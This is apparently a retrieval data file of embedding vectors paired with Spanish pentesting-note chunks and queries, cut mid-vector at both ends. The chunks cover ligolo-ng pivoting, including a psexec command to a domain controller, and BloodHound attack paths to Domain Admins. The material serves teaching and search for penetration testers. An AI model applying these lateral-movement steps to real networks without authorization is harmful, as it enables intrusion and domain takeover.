-0.00015, -0.01745, 0.07769, -0.02647, -0.08441, 0.02405, -0.00668, -0.11434, -0.12006, 0.00608, -0.08528, 0.01675, 0.05947, -0.06162, -0.10016, 0.00665, -0.03328, 0.02283, -0.13392, -0.02902, 0.01632, -0.01632, -0.04656, -0.02213, 0.05708, -0.03819, 0.0859, -0.01026, -0.01742, -0.01946, 0.07891, -0.06218, -0.03144, -0.06365, -0.00472, -0.11199, 0.00887, -0.03793, -0.0532, 0.06093, 0.00132, -0.11828, 0.06958, -0.03111, -0.00856, -0.04874, -0.00335, 0.03088, -0.0881, 0.06268, -0.06089, -0.04038, -0.00738, -0.07923, -0.1252, -0.05202, 0.00641, -0.01448, 0.00191, 0.03335, 0.02336, 0.0718, 0.01746, -0.00993, 0.06108, 0.08822, 0.01865, -0.07437, 0.03486, 0.01202, -0.00742, -0.08391, -0.00898, -0.01541, -0.00925, 0.08654, 0.02066, -0.0233, 0.06113, -0.04651, 0.05151, -0.00366, -0.02513, 0.04007, -0.05999, -0.06369, -0.02689, 0.068, -0.07655, 0.00782, -0.00281, 0.06256, -0.01898, 0.06651, 0.04279, 0.05188, 0.03521, 0.07061, 0.0315, 0.0586, -0.00709, -0.0072, 0.00969, -0.01773, -0.01423, 0.0216, -0.00862, 0.03788, 0.01032, -0.07501, -0.02514, 0.04518, 0.12417, 0.0177, -0.03251, 0.01621, -0.05106, -0.10608, -0.00637, -0.016, -0.07553, -0.05737, 0.03591, 0.04621, -0.03005, 0.00374, 0.01598]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "cual es la tecnica de pivoteo en penetration testing", "v": [0.07217, -0.09152, -0.2129, -0.12689, 0.16846, -0.10204, 0.0067, -0.06337, 0.02096, -0.01256, 0.03547, 0.14474, -0.01198, 0.06277, 0.03171, -0.03858, 0.05089, -0.10736, 0.12466, -0.11624, -0.11968, 0.01187, -0.074, -0.04816, 0.035, 0.1489, -0.02397, 0.06961, -0.11086, 0.0034, 0.00732, 0.03809, 0.12472, -0.07824, -0.02646, -0.04847, 0.06387, 0.03176, 0.10123, 0.17847, -0.10902, -0.08217, 0.02267, 0.02211, 0.18306, -0.16246, 0.06077, 0.0387, -0.0637, 0.00472, 0.01117, 0.18125, 0.01722, -0.06639, 0.00202, -0.07906, 0.10864, 0.01546, 0.04421, -0.10038, -0.06589, -0.06095, 0.04011, -0.14577, -0.05913, -0.10993, -0.02061, -0.10528, -0.03727, -0.00335, 0.0666, 0.07147, 0.05197, 0.03004, -0.08444, 0.01884, 0.03731, 0.05171, 0.0622, -0.02815, 0.01156, 0.07283, -0.02727, -0.01274, -0.09585, -0.08579, 0.02056, 0.04718, -0.00111, -0.08077, 0.00436, -0.04495, 0.00875, 0.02875, 0.02377, 0.00613, 0.00078, 0.0179, 0.04321, -0.087, 0.06051, -0.0194, -0.1225, 0.05446, 0.06285, 0.02496, -0.02864, -0.0423, 0.00478, -0.04546, -0.00493, 0.09796, -0.08614, -0.01703, 0.04395, 0.01681, 0.00273, -0.10643, -0.04886, -0.07059, 0.03097, -0.01096, -0.01047, -0.02072, -0.05781, 0.01222, 0.03369, 0.01729, 0.02824, 0.03588, 0.12945, -0.01335, -0.07244, 0.0842, -0.05325, -0.01245, 0.13762, -0.03684, -0.04245, 0.06777, 0.01207, 0.07129, 0.00706, 0.01622, 0.00993, 0.02905, 0.00659, -0.05995, -0.10017, -0.00644, -0.11411, 0.02788, -0.04674, 0.1271, -0.05058, -0.10103, 0.03118, -0.01361, 0.00882, 0.08504, -0.00101, 0.04994, 0.05294, -0.02218, 0.02782, 0.04305, -0.02798, -0.08176, 0.04818, -0.11032, -0.04283, 0.02383, -0.05986, 0.04269, -0.0241, 0.01813, 0.00937, 0.00686, -0.01528, -0.04884, -0.01224, 0.01105, -0.00594, -0.07353, 0.07092, 0.06, -0.00174, 0.02537, 0.09072, -0.03613, 0.01725, -6e-05, -0.10739, -0.01244, 0.02739, -0.05857, -0.01125, 0.04326, 0.00279, -0.01896, 0.01202, -0.00709, -0.01763, -0.07817, -0.00627, 0.02012, -0.01928, -0.06192, -0.00922, -0.04197, 0.02836, -0.00841, 0.04007, -0.02928, -0.03606, 0.0054, 0.00793, -0.00705, -0.03427, 0.04626, -0.00283, -0.01442, 0.05687, -0.03574, -0.08677, 0.01702, 0.03063, -0.01312, 0.028, 0.03124, 0.05511, 0.00577, -0.00467, -0.0064, 0.06579, 0.01991, 0.0272, 0.00864, -0.01167, -0.09358, 0.05073, 0.06085, -0.01495, -0.00835, -0.02326, -0.01001, -0.08765, -0.01904, -0.01302, -0.07027, -0.00086, 0.03323, 0.00547, -0.05112, 0.07683, -0.0453]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### QuΓ© hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, mΓ‘quinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"ΒΏCuΓ‘l es el camino mΓ‘s corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **dΓ­as** de mirar listados de grupos a mano.", "indexar": "que herramienta me ayuda a visualizar las relaciones entre usuarios y mΓ‘quinas en Active Directory?", "v": [-0.03116, 0.15973, -0.08415, -0.33649, -0.08607, -0.04444, -0.17582, 0.03413, -0.04705, -0.04079, 0.01789, -0.13622, 0.02348, -0.06693, 0.11225, -0.04836, 0.13304, -0.05723, -0.02367, -0.01922, 0.05607, -0.00019, -0.08878, 0.0802, -0.03795, 0.11594, 0.03688, -0.08465, -0.11475, 0.05471, 0.03412, -0.0104, 0.01662, 0.0042, -0.03198, -0.08387, -0.03605, 0.04492, 0.10694, 0.04478, -0.10277, -0.04562, -0.08704, -0.02303, 0.12973, 0.11075, -0.07002, -0.058, 0.00408, 0.13332, -0.13717, -0.18286, -0.06922, -0.01467, 0.00127, -0.18043, 0.19018, -0.04595, 0.01758, -0.16423, -0.11204, -0.0601, -0.06237, 0.01892, -0.06708, -0.00522, 0.12203, -0.10239, -0.12249, 0.08852, -0.04399, 0.0108, 0.00808, 0.01395, 0.02513, -0.00631, 0.12631, 0.05049, -0.07488, -0.02733, 0.06199, 0.00929, -0.00709, -0.0075, -0.01275, -0.0721, 0.06879, -0.01411, 0.05731, -0.07611, 0.04896, 0.09839, -0.02608, -0.04215, 0.06689, 0.07125, 0.00369, -0.07355, 0.0755, -0.02833, 0.11202, -0.04916, -0.00998, 0.05001, -0.05771, -0.01088, -0.00363, 0.01747, -0.08124, 0.05033, 0.07017, 0.00022, 0.07911, -0.08142, -0.03568, 0.10134, -0.04965, -0.04474, -0.0282, -0.08629, -0.01617, -0.00287, 0.04651, -0.01881, -0.00212, 0.00441, 0.04356, 0.07441, -0.03221, -0.036, -0.00404, 0.00419, -0.07311, -0.03646, 0.05796, -0.04925, 0.0209, -0.05955, -0.01327, -0.08933, -0.00048, 0.01365, -0.0405, -0.09466, 0.02149, -0.01805, 0.05452, -0.03484, -0.0, -0.01131, 0.06771, -0.04018, 0.00642, 0.0118, 0.00786, 0.04269, -0.05862, 0.04852, -0.07496, -0.0451, -0.03316, -0.04259, 0.04514, -0.02853, -0.01407, 0.01339, -0.04655, 0.021, 0.03173, 0.03195, 0.03249, 0.01002, 0.04071, 0.01913, -0.02574, -0.02664, 0.0497, 0.01977, -0.00346, -0.03204, 0.01834, -0.03465, -0.02735, -0.04381, -0.02137, -0.01666, -0.02595, -0.05766, 0.01145, 0.0204, 0.00113, 0.05484, 0.00559, -0.07753, 0.0441, -0.03185, -0.025, 0.01849, 0.03323, -0.02932, 0.01804, -0.02713, 0.03162, -0.02615, -0.01528, 0.0573, -0.0467, -0.01993, 0.02667, -0.04897, 0.0138, 0.03523, -0.00262, 0.00049, -0.06445, -0.01555, -0.0075, 0.0309, -0.02574, -0.06927, 0.00305, -0.03981, 0.02705, -0.04165, 0.04692, 0.00713, 0.0374, 0.02428, -0.00194, -0.01111, -0.01246, -0.06156, 0.05042, -0.03936, 0.03279, -0.03842, 0.04978, -0.08431, -0.00905, -0.02243, 0.02395, 0.02563, 0.05864, -0.00945, -0.09166, -0.00551, 0.02756, -0.0396, -0.07194, -0.0272, 0.00071, 0.01889, 0.05875, -0.03268, -0.02034, 0.02947]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### QuΓ© hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, mΓ‘quinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"ΒΏCuΓ‘l es el camino mΓ‘s corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **dΓ­as** de mirar listados de grupos a mano.", "indexar": "cual es un programa para dibujar el grafo de conexiones en Active Directory de forma rΓ‘pida?", "v": [0.12387, 0.07469, -0.03041, -0.12377, 0.09062, -0.0495, 0.00595, 0.01907, -0.005, 0.00722, 0.09795, -0.16551, -0.2114, -0.13286, 0.02132, -0.0329, 0.10002, -0.08829, -0.04296, -0.04081, 0.03938, 0.12385, -0.02154, -0.04895, -0.02751, -0.09624, 0.02169, 0.00546, -0.05813, 0.06688, 0.07058, 0.01233, 0.12941, -0.08679, -0.07578, -0.07251, 0.08036, -0.00331, 0.06739, 0.04015, -0.112, 0.01126, -0.12549, 0.07544, 0.00871, 0.03167, 0.04788, -0.06932, -0.03966, 0.04999, -0.01191, 0.04342, -0.02246, 0.03056, 0.01541, -0.10515, 0.04831, -0.20057, -0.00817, -0.0316, 0.07693, -0.01085, -0.06896, -0.11549, -0.03385, -0.06427, 0.07783, -0.07398, -0.0873, 0.03419, 0.08458, 0.05621, 0.00065, 0.0521, 0.12246, 0.0119, -0.07148, -0.08326, 0.06329, 0.0271, -0.00299, -0.01365, -0.00254, 0.01139, -0.16417, -0.02582, -0.06075, -0.04833, -0.10279, -0.03256, 0.03545, 0.02927, -0.02799, 0.1013, 0.00996, 0.02983, 0.03683, 0.06987, 0.08453, 0.00411, 0.0367, -0.0077, -0.19287, 0.06724, -0.05471, 0.03567, -0.00857, 0.1195, -0.14521, 0.16557, 0.05104, 0.03839, 0.06978, -0.01143, -0.0217, -0.01853, -0.01278, -0.02038, 0.00303, -0.09441, -0.05437, -0.06091, 0.08615, 0.05985, 0.03653, 0.00652, -0.05662, 0.10436, -0.02155, 0.10347, -0.02291, 0.03832, -0.04387, -0.15155, -0.08984, -0.00781, -0.00759, -0.04339, 0.08168, -0.09074, 0.02349, -0.0002, 0.07246, -0.01393, -0.04828, 0.03648, 0.04077, -0.03149, -0.0796, 0.06807, -0.08756, 0.03517, 0.06016, 0.03361, 0.03486, 0.01194, -0.02685, -0.00362, -0.02496, 0.04275, -0.04523, 0.02937, 0.09407, -0.00152, -0.02657, -0.08553, -0.1386, 0.02835, 0.05147, 0.12045, -0.03128, 0.05053, 0.01218, -0.05044, 0.00553, -0.00415, -0.06899, -0.04976, 0.0076, 0.00906, -0.01647, 0.04131, 0.05728, 0.03071, -0.03645, -0.02445, 0.03748, 0.05908, 0.06917, -0.00172, -0.04716, 0.01984, -0.03909, 0.05359, -0.01843, -0.06307, 0.05298, 0.04626, 0.01688, -0.07585, 0.01723, -0.00395, -0.0117, 0.01687, 0.0152, 0.11974, -0.04068, 0.05372, 0.05836, 0.0664, 0.00448, 0.01171, 0.05741, 0.02167, 0.03075, 0.03052, -0.02301, -0.03753, 0.06887, 0.02514, -0.01909, 0.02159, -0.01092, 0.0292, 0.05555, -0.03615, 0.00048, 0.03402, 0.01569, 0.01208, 0.01954, 0.03709, 0.00759, -0.04268, 0.02996, 0.00911, 0.00573, -0.04693, -0.02524, -0.073, 0.06158, 0.05463, -0.01016, 0.03915, -0.00414, -0.0095, -0.06517, -0.03756, -0.00016, -0.04075, 0.01399, 0.03492, 0.0839, -0.01955, 0.03996, 0.0129]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β” MemberOf β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ juan β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ HelpDesk β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ AdminTo\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ workstation42β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ HasSession (admin con sesiΓ³n activa aquΓ­)\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ ana β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ MemberOf\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Domain Adminsβ”‚ ← jackpot\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© puedo tener un control total sobre todos los usuarios de mi dominio", "v": [-0.12088, 0.11359, -0.04739, -0.0242, -0.0749, 0.00019, -0.00469, 0.03792, -0.14245, -0.02936, -0.04759, -0.11174, 0.08955, -0.17095, 0.00237, -0.13176, 0.18119, -0.05733, 0.06191, -0.0526, 0.01013, -0.13322, 0.04238, -0.00431, 0.03331, -0.07193, 0.04948, -0.08779, -0.01373, 0.08229, -0.00451, -0.0979, 0.01018, 0.03832, -0.0435, -0.01169, 0.05895, 0.15753, 0.13376, 0.14707, -0.00908, -0.03209, -0.09133, 0.02297, 0.05038, 0.07963, -0.06574, -0.13601, -0.01201, -0.10199, -0.04385, -0.05061, -0.07993, 0.00231, -0.03072, -0.05627, 0.0195, -0.09421, 0.09256, -0.06892, -0.10899, -0.04001, 0.01353, 0.155, -0.07741, -0.11896, 0.03228, 0.02899, -0.05294, 0.16307, 0.05538, -0.04834, -0.01906, -0.00398, 0.07277, -0.03524, 0.02302, -0.02245, 0.0529, -0.11352, 0.02758, -0.0121, -0.06364, -0.07672, -0.06762, -0.0464, -0.1704, -0.13468, 0.01402, 0.04428, 0.05285, -0.01934, -0.04169, -0.08434, -0.09611, -0.01446, 0.00693, 0.00423, -0.10508, -0.04034, 0.07317, 0.14198, -0.05199, 0.13058, 0.11115, 0.02938, 0.05833, -0.07814, -0.02381, -0.01948, -0.02449, -0.03744, -0.06461, -0.02296, -0.02341, 0.07029, -0.09492, 0.01343, 0.02585, -0.06276, -0.04652, 0.01044, 0.10888, -0.05068, 0.09996, 0.00618, 0.08915, 0.01124, -0.06024, -0.11432, -0.00724, -0.03657, -0.01544, -0.06474, 0.02852, 0.02258, -0.04228, 0.04757, -0.0404, 0.07343, -0.08172, 0.01435, -0.08476, -0.04391, -0.00716, -0.15755, -0.00018, -0.04154, -0.01386, -0.03057, -0.06448, 0.00238, -0.00849, -0.03796, 0.02966, 0.07691, -0.0651, -0.01047, 0.03076, -0.00487, -0.02698, -0.00374, -0.03513, 0.00934, 0.07023, -0.02213, 0.01767, 0.014, -0.0287, 0.02526, -0.03491, 0.08098, 0.01473, -0.00834, 0.04541, -0.02094, 0.00403, -0.03911, -0.05098, -0.0342, 0.00338, -0.06021, -0.00133, 0.09233, 0.00851, 0.05743, 0.01637, 0.02824, -0.01897, 0.05171, 0.02745, 0.08022, 0.02472, -0.01302, 0.0327, -0.02406, 0.02411, 0.0206, -0.02223, 0.0078, 0.00568, -0.05619, 0.04249, 0.04225, -0.02744, -0.06016, 0.03518, -0.04893, 0.06781, -0.06469, 0.02079, 0.02046, 0.02751, -0.01256, -0.03782, 0.03052, 0.00605, 0.02356, 0.0273, -0.13937, -0.00459, 0.01473, -0.01167, -0.0146, 0.01872, 0.02336, -0.02517, -0.03322, -0.00022, 0.06764, -0.00142, -0.0529, -0.0082, 0.01184, 0.0162, -0.05824, 0.02479, 0.01138, -0.00378, 0.03248, -0.08383, 0.04311, 0.08071, -0.01935, -0.0798, -0.05519, -0.04865, 0.01504, -0.10786, -0.00308, 0.00443, -0.01936, 0.03223, 0.01231, -0.05979, 0.06805]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β” MemberOf β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ juan β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚ HelpDesk β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ AdminTo\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ workstation42β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ HasSession (admin con sesiΓ³n activa aquΓ­)\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ ana β”‚\n β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ MemberOf\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Domain Adminsβ”‚ ← jackpot\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© programa me permite ver si alguien tiene una sesiΓ³n activa en la red", "v": [-0.11478, 0.18331, -0.14404, -0.13069, -0.02954, -0.05531, -0.14836, -0.10508, 0.00057, -0.19596, -0.11907, -0.08395, 0.01031, -0.10342, 0.19152, 0.04536, -0.01566, 0.04899, 0.17862, -0.00716, 0.01821, -0.00794, -0.0661, -0.06071, 0.15083, 0.05281, 0.22843, -0.00818, 0.08639, -0.04637, -0.02373, -0.07979, 0.05994, -0.10589, 0.00949, 0.05172, -0.00313, 0.02466, 0.08006, 0.10794, -0.04838, 0.07247, -0.04678, -0.04559, 0.14855, 0.01635, -0.01118, -0.01662, -0.10176, -0.00302, -0.03945, 0.0285, -0.05732, -0.03603, 0.00282, -0.08125, 0.00344, -0.07007, -0.0452, 0.01244, -0.00859, 0.01285, 0.00506, 0.02573, 0.02272, -0.0427, 0.137, 0.0463, 0.03691, 0.12126, 0.00996, -0.02023, -0.01992, 0.06115, 0.09368, -0.03924, -0.02182, -0.12737, 0.01231, -0.07255, -0.01368, 0.05317, 0.05455, 0.11325, -0.08843, -0.00014, 0.08127, -0.0051, -0.03574, -0.0263, -0.01407, 0.01953, 0.07867, -0.0377, 0.07195, 0.05038, 0.06785, 0.10135, -0.02598, 0.05265, 0.0846, 0.01388, -0.12318, 0.07896, -0.04628, 0.02021, 0.00746, 0.01048, -0.00664, 0.01223, 0.03237, -0.01615, -0.00846, -0.05203, -0.01033, 0.05549, 0.02939, -0.03305, -0.00841, 0.0272, -0.11755, 0.04021, -0.02187, -0.0333, 0.05405, -0.06642, -0.06486, 0.06047, -0.05736, 0.07309, -0.05924, -0.00875, 0.03912, -0.175, -0.06278, -0.06493, 0.01109, -0.04189, -0.04787, -0.07761, -0.03958, 0.07847, 0.01102, -0.01985, 0.00193, 0.04117, 0.05796, -0.06445, 0.01375, 0.09139, -0.0136, -0.03887, 0.07234, 0.02216, -0.04887, 0.06344, 0.06469, -0.00995, -0.02836, 0.07001, -0.04704, -0.02876, -0.07237, -0.09252, 0.03254, -0.02594, -0.06457, -0.0122, 0.04482, 0.08899, -0.03625, 0.01853, -0.00901, -0.07358, 0.01898, -0.04137, -0.01006, -0.07834, 0.03549, -0.06579, -0.02073, -0.01206, 0.0951, -0.02832, -0.02831, -0.04068, -0.06495, 0.04823, 0.02093, -0.05208, -0.02002, 0.022, -0.03775, 0.0078, 0.01372, 0.06316, -0.0275, -0.04016, 0.02591, -0.02999, -0.04097, -0.02762, 0.04258, 0.00938, 0.01672, 0.048, 0.00123, 0.03813, 0.02758, 0.09939, -0.034, 0.04437, 0.09288, 0.00705, -0.05736, -0.01809, -0.00197, 0.03703, 0.07988, -0.0205, 0.05424, -0.01514, 0.04352, 0.0898, 0.02538, -0.06488, 0.03901, -0.0001, -0.00217, 0.08283, 0.04616, -0.07667, 0.00234, 0.01754, 0.0418, -0.01679, 0.00121, 0.03341, 0.00429, -0.03845, -0.02434, 0.05689, -0.00921, -0.02895, 0.0632, 0.03869, -0.03504, -0.01578, -0.01597, -0.02166, -0.03843, 0.04329, 0.04819, -0.07257, 0.05304, 0.04067]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Componentes\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ SharpHound (.exe)β”‚ o β”‚ bloodhound-pythonβ”‚ ────► β”‚ JSON files β”‚\n β”‚ corre en vΓ­ctima β”‚ β”‚ corre en Kali β”‚ β”‚ con datos ADβ”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ BloodHound GUI β”‚\n β”‚ (en tu Kali) β”‚\n β”‚ + β”‚\n β”‚ Neo4j (base BD) β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© herramientas o tΓ©cnicas sirven para mapear la infraestructura de Active Directory?", "v": [0.03025, 0.03051, -0.04588, -0.31927, 0.02213, -0.12048, -0.05781, -0.02033, -0.05659, 0.06737, -0.0326, -0.04511, -0.02097, -0.07804, 0.13006, 0.08323, 0.10586, -0.17698, 0.03971, -0.06965, -0.07304, 0.13058, -0.15025, 0.1118, -0.09722, 8e-05, 0.01737, -0.13371, -0.28204, -0.04512, 0.03963, 0.13409, 0.05, -0.02275, -0.07819, -0.17641, -0.03392, 0.03572, 0.00538, 0.01649, -0.15431, -0.0651, -0.08998, 0.03368, 0.1609, 0.01029, -0.02295, -0.03074, 0.05523, 0.0597, -0.10535, -0.03988, -0.02196, -0.06248, 0.06757, -0.03673, 0.07479, -0.10158, -0.00573, -0.07455, -0.10545, -0.0706, -0.07947, -0.0395, -0.00187, -0.05707, 0.03279, -0.10356, -0.13147, 0.05662, 0.03658, 0.05963, 0.0771, 0.10176, -0.01445, -0.02154, 0.03197, 0.02533, -0.05508, 0.06535, 0.06842, 0.11171, -0.08359, 0.03766, -0.05758, -0.04936, 0.02457, -0.04151, 0.03963, -0.11392, -0.01408, 0.12653, 0.00426, 0.04505, 0.03959, 0.03735, 0.04376, 0.05212, 0.04747, 0.02522, 0.02051, 0.01508, 0.00038, 0.03362, 0.01168, 0.05895, -0.0025, 0.0694, -0.10899, 0.00134, -0.02689, 0.12833, 0.00941, -0.0579, 0.06028, 0.02819, -0.02126, -0.08815, -0.0316, -0.01442, -0.00311, 0.03744, -0.00149, 0.06219, 0.01369, 0.02162, -0.02776, 0.00308, 0.09973, 0.00449, 0.08087, -0.00539, -0.01342, -0.06627, -0.03849, -0.01287, 0.01963, -0.09198, -0.02767, -0.06915, -0.04174, -0.00893, -0.05862, -0.02705, -0.0599, 0.03377, 0.08886, -0.05338, -0.03534, -0.07673, 0.03091, -0.00387, -0.02617, 0.0263, 0.0059, 0.00823, 0.0381, -0.02068, -0.14105, 0.07699, -0.03425, -0.01129, -0.00198, 0.02872, -0.03341, 0.01032, -0.06464, 0.0679, 0.03236, 0.06259, 0.0125, 0.0776, 0.02289, -0.0207, -0.05826, -0.00973, -0.04527, 0.02632, 0.00377, 0.00365, -0.03834, -0.07634, -0.02675, 0.06489, -0.00417, 0.02891, -0.01257, -0.06159, 0.0363, 0.01295, -0.03903, -0.00302, 0.01889, 0.02214, -0.02114, -0.08533, 0.0205, -0.01471, -0.03506, -0.0071, 0.01365, 0.00271, 0.01349, -0.03112, -0.01999, 0.05853, 0.00932, -0.04841, -0.00583, 0.01363, 0.00257, -0.045, 0.07569, -0.03852, 0.0, -0.01223, -0.00931, 0.03634, -0.02852, 0.01856, 0.027, -0.03027, -0.05102, 0.0198, 0.01393, 0.02877, 0.01094, -0.02404, 0.00405, -0.02183, 0.02176, -0.02555, 0.00809, 0.03016, -0.03608, -0.03193, 0.01562, -0.04653, -1e-05, -0.00014, 0.0468, 0.05923, -0.01521, -0.02664, -0.05906, 0.00089, 0.02877, -0.03767, -0.0306, -0.03549, -0.00209, -0.01628, 0.02125, 0.02555, -0.01853, -0.05347]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Componentes\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ SharpHound (.exe)β”‚ o β”‚ bloodhound-pythonβ”‚ ────► β”‚ JSON files β”‚\n β”‚ corre en vΓ­ctima β”‚ β”‚ corre en Kali β”‚ β”‚ con datos ADβ”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚\n β–Ό\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ BloodHound GUI β”‚\n β”‚ (en tu Kali) β”‚\n β”‚ + β”‚\n β”‚ Neo4j (base BD) β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© programa puedo visualizar las relaciones entre los usuarios y los grupos en un dominio?", "v": [-0.11975, 0.12811, -0.05945, -0.19332, -0.09699, -0.03353, 0.062, -0.0328, -0.09375, -0.10634, 0.07634, -0.07204, 0.01215, -0.13725, 0.03622, -0.04475, 0.2206, 0.00341, 0.02395, -0.03865, -0.01102, -0.12766, 0.0366, 0.03059, -0.04149, -0.0323, 0.03658, -0.07978, 0.13016, 0.14079, 0.0292, -0.09257, -0.01385, -0.06113, -0.03092, -0.03722, 0.06644, 0.11211, 0.09104, 0.03349, -0.04283, -0.10971, -0.13222, -0.06997, 0.02968, 0.05007, -0.14835, -0.06121, 0.01479, -0.11524, -0.06752, 0.02537, -0.08503, -0.0022, 0.00722, -0.10434, 0.0679, -0.12415, 0.04088, -0.00468, -0.09633, -0.04022, 0.04936, 0.01436, 0.00247, -0.04275, 0.09883, 0.09656, -0.07579, 0.09708, -0.00049, -0.0672, -0.04875, -0.02783, 0.06194, 0.07063, 0.05248, 0.01917, -0.03395, -0.11299, 0.062, 0.05803, 0.02858, -0.00511, -0.09014, -0.04624, -0.00466, -0.05046, -0.00267, 0.00051, 0.136, 0.11426, -0.02892, -0.04966, 0.03392, -0.06951, 0.029, 